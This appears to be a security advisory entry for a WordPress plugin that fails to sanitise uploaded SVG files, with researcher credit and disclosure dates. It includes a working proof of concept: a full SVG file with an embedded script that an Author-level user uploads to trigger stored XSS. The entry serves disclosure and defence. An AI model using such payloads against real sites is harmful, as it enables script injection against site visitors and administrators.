The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads
As an author or above, upload the below SVG file via the Media library: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" /> <script type="text/javascript"> alert(/XSS/); </script> </svg> The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg
Luan Pedersini
IBLISS Digital Security
Yes
2022-06-01 (about 1 years ago)
2022-06-01 (about 1 years ago)
2023-03-01 (about 6 months ago)